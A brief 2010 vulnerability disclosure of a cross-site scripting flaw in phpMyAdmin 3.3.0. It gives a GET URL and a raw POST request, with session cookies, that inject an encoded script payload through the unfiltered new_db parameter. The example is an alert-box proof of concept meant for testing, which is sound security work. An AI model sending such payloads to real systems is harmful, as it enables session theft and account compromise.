there is a xss in phpmyadmin 3.3.0 when we create new database in interface, the "new_db" parameter do not filter characters when users enter. attacker can enter malicious code, like "". it also can be true in post and get. but in post, we can not encode xss code, or , the xss will faild. For example: GET: http://localhost/phpmyadmin/db_create.php?token=567eb60e7b1692f64df9251ab7ae3934&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation= POST: POST /phpmyadmin/db_create.php HTTP/1.1 Accept: */* Referer: http://localhost/phpmyadmin/db_create.php Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727) Host: localhost Content-Length: 123 Connection: Keep-Alive Cache-Control: no-cache Cookie: phpMyAdmin=95830e770d0f213c04d63b623940f46f95c6f571; pma_lang=en-utf-8; pma_charset=utf-8; pma_collation_connection=utf8_general_ci; pmaUser-1=Hfd255%2Bp2dc%3D; pma_navi_width=200; pmaPass-1=MlPzQC8J2iY%3D; pma_fontsize=82%25; pma_theme=original token=759f7a380111a292995ec447408bbdb3&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation= When you test, please replace the session "759f7a380111a292995ec447408bbdb3" with yourself. I suggest to test it in interface. Liscker 2010.03.12